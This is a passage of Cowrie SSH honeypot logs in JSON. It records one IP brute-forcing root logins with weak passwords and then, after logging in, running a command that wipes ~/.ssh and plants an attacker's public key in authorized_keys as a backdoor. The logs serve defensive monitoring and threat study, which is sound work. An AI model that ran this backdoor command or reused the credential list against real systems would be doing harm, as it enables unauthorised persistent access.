ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:07:20.142427Z","src_ip":"212.227.235.229","session":"898aa94861b0"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T10:07:20.577730Z","src_ip":"212.227.235.229","session":"898aa94861b0"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:07:21.702091Z","src_ip":"212.227.235.229","session":"898aa94861b0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35644,"dst_ip":"1.2.3.4","dst_port":22,"session":"ccdabeda9648","protocol":"ssh","message":"New connection: 212.227.235.229:35644 (1.2.3.4:22) [session: ccdabeda9648]","sensor":"my-vps","timestamp":"2025-09-09T10:07:21.797225Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:07:21.799815Z","src_ip":"212.227.235.229","session":"ccdabeda9648"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:07:21.896645Z","src_ip":"212.227.235.229","session":"ccdabeda9648"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T10:07:22.298224Z","src_ip":"212.227.235.229","session":"ccdabeda9648"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:07:22.395971Z","src_ip":"212.227.235.229","session":"ce167ee805a8"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:07:22.399108Z","src_ip":"212.227.235.229","session":"ccdabeda9648"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57756,"dst_ip":"1.2.3.4","dst_port":22,"session":"9e9cffc86e10","protocol":"ssh","message":"New connection: 212.227.235.229:57756 (1.2.3.4:22) [session: 9e9cffc86e10]","sensor":"my-vps","timestamp":"2025-09-09T10:07:24.725239Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:07:24.726922Z","src_ip":"212.227.235.229","session":"9e9cffc86e10"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:07:24.987914Z","src_ip":"212.227.235.229","session":"9e9cffc86e10"}
{"eventid":"cowrie.login.success","username":"root","password":"qwe123..","message":"login attempt [root/qwe123..] succeeded","sensor":"my-vps","timestamp":"2025-09-09T10:07:26.067575Z","src_ip":"212.227.235.229","session":"9e9cffc86e10"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T10:07:26.649913Z","src_ip":"212.227.235.229","session":"9e9cffc86e10"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T10:07:26.652465Z","src_ip":"212.227.235.229","session":"9e9cffc86e10"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T10:07:26.655201Z","src_ip":"212.227.235.229","session":"9e9cffc86e10"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:07:26.917926Z","src_ip":"212.227.235.229","session":"9e9cffc86e10"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T10:07:27.510567Z","src_ip":"212.227.235.229","session":"9e9cffc86e10"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T10:07:27.513329Z","src_ip":"212.227.235.229","session":"9e9cffc86e10"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T10:07:27.774528Z","src_ip":"212.227.235.229","session":"9e9cffc86e10"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:07:27.777466Z","src_ip":"212.227.235.229","session":"9e9cffc86e10"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58988,"dst_ip":"1.2.3.4","dst_port":22,"session":"34ce37934800","protocol":"ssh","message":"New connection: 212.227.235.229:58988 (1.2.3.4:22) [session: 34ce37934800]","sensor":"my-vps","timestamp":"2025-09-09T10:07:28.031374Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:07:28.034638Z","src_ip":"212.227.235.229","session":"34ce37934800"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:07:28.292512Z","src_ip":"212.227.235.229","session":"34ce37934800"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T10:07:29.328925Z","src_ip":"212.227.235.229","session":"34ce37934800"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:07:30.596559Z","src_ip":"212.227.235.229","session":"34ce37934800"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60052,"dst_ip":"1.2.3.4","dst_port":22,"session":"6452246c684c","protocol":"ssh","message":"New connection: 212.227.235.229:60052 (1.2.3.4:22) [session: 6452246c684c]","sensor":"my-vps","timestamp":"2025-09-09T10:07:30.853479Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:07:30.856541Z","src_ip":"212.227.235.229","session":"6452246c684c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38968,"dst_ip":"1.2.3.4","dst_port":22,"session":"3fc0c2df3aea","protocol":"ssh","message":"New connection: 212.227.235.229:38968 (1.2.3.4:22) [session: 3fc0c2df3aea]","sensor":"my-vps","timestamp":"2025-09-09T10:07:30.971671Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:07:30.977526Z","src_ip":"212.227.235.229","session":"3fc0c2df3aea"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:07:31.219641Z","src_ip":"212.227.235.229","session":"3fc0c2df3aea"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:07:31.832576Z","src_ip":"212.227.235.229","session":"6452246c684c"}
{"eventid":"cowrie.login.failed","username":"deployer","password":"password1","message":"login attempt [deployer/password1] failed","sensor":"my-vps","timestamp":"2025-09-09T10:07:32.567033Z","src_ip":"212.227.235.229","session":"3fc0c2df3aea"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T10:07:33.125284Z","src_ip":"212.227.235.229","session":"6452246c684c"}
{"eventid":"cowrie.session.closed","duration":"8.7","message":"Connection lost after 8.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:07:33.387041Z","src_ip":"212.227.235.229","session":"9e9cffc86e10"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:07:33.387909Z","src_ip":"212.227.235.229","session":"6452246c684c"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:07:33.817279Z","src_ip":"212.227.235.229","session":"3fc0c2df3aea"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49216,"dst_ip":"1.2.3.4","dst_port":22,"session":"a14ce46f4270","protocol":"ssh","message":"New connection: 212.227.235.229:49216 (1.2.3.4:22) [session: a14ce46f4270]","sensor":"my-vps","timestamp":"2025-09-09T10:08:08.051492Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:08:08.057441Z","src_ip":"212.227.235.229","session":"a14ce46f4270"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:08:08.322984Z","src_ip":"212.227.235.229","session":"a14ce46f4270"}
{"eventid":"cowrie.login.failed","username":"nobody","password":"qwerty","message":"login attempt [nobody/qwerty] failed","sensor":"my-vps","timestamp":"2025-09-09T10:08:09.440747Z","src_ip":"212.227.235.229","session":"a14ce46f4270"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:08:10.710544Z","src_ip":"212.227.235.229","session":"a14ce46f4270"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35648,"dst_ip":"1.2.3.4","dst_port":22,"session":"da6832fc1ed7","protocol":"ssh","message":"New connection: 212.227.235.229:35648 (1.2.3.4:22) [session: da6832fc1ed7]","sensor":"my-vps","timestamp":"2025-09-09T10:08:20.336552Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T10:08:20.340685Z","src_ip":"212.227.235.229","session":"da6832fc1ed7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T10:08:20.437651Z","src_ip":"212.227.235.229","session":"da6832fc1ed7"}
{"eventid":"cowrie.login.success","username":"root","password":"Ubuntu123","message":"login attempt [root/Ubuntu123] succeeded","sensor":"my-vps","timestamp":"2025-09-09T10:08:20.866763Z","src_ip":"212.227.235.229","session":"da6832fc1ed7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T10:08:21.096518Z","src_ip":"212.227.235.229","session":"da6832fc1ed7"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T10:08:21.097430Z","src_ip":"212.227.235.229","session":"da6832fc1ed7"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T10:08:21.098419Z","src_ip":"212.227.235.229","session":"da6832fc1ed7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T10:08:21.202116Z","src_ip":"212.227.235.229","session":"da6832fc1ed7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T10:08:21.506894Z","src_ip":"212.227.235.229","session":"da6832fc1ed7"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T10:08:21.510036Z","src_ip":"212.227.235.229","session":"da6832fc1ed7"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T10:08:21.619427Z","src_ip":"212.227.235.229","session":"da6832fc1ed7"}
